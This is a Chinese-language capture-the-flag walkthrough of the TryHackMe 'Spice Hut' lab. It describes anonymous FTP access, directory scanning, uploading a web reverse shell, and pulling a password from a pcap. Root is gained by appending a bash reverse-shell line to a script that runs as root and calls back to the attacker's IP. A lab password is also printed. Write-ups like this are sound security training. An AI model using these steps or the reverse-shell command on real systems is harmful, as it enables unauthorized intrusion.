tryhackme-Spice Hut(香料小屋)

信息收集

通过开放端口可以发现21端口和80端口可以进行下手，首先对21端口进行匿名用户访问测试登录成功

将important.jpg和notice.txt文件下载，ftp目录并没有文件，但是通过权限的观察可以进行写入（也就是上传文件），后续可能用到

通过查看notice.txt得到一些管理员的信息，大概意思是不知道谁上传了一个文件，很可笑，透漏了一个用户名为Maya

通过分析important.jpg并没有得到有用的信息

接着访问80端口看一看有没有什么新的消息

主页是招聘网络安全人员的信息，没有太大的用处，直接进行目录扫描

gobuster dir -u http://10.10.218.215/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php,zip,rar,js -t 66

初始访问权限

通过扫描得到一个files目录，访问查看

发现和ftp匿名登录的目录一样，这里我们可以使用ftp上传反弹shell文件
上传成功

使用浏览器访问获得shell

在根目录发现recipe.txt,得到辣汤的秘方为love(爱)

权限提升

有一个奇怪的目录incidents,进入查看有一个suspicious.pcapng数据包文件，将suspicious.pcapng复制到/var/www/html/files/ftp目录，然后下载

一般情况下需要使用wireshark分析，但是我并不太熟练使用，不过我通过strings工具的分析，得到了用户的密码c4ntg3t3n0ughsp1c3

应该是lennie用户的密码，使用ssh远程连接得到user.txt

获取root权限

发现scripts目录，进入查看发现planner.sh和startup_list.txt文件

有意思是的，通过上图发现startup_list.txt文件的最后更改时间是刚刚

接着查看planner.sh文件发现执行了/etc/print.sh文件

分析这两个文件的权限

发现planner.sh文件的所有者是root，我们拥有/etc/print.sh文件的修改权限

这里就有了一个思路，我们可以借用planner.sh文件的root权限调用/etc/print.sh文件执行我们想要的反弹shell代码，然后获得root权限，这里只是猜测，因为startup_list.txt文件是由planner.sh文件生成，并且最后一次修改时间是当前最近的时间，猜测可能有后台进程。

这里只需要在/etc/print.sh加入/bin/bash -i >& /dev/tcp/10.14.74.4/8888 0>&1即可，实际操作如下：

加入后，等待一分钟，获得root权限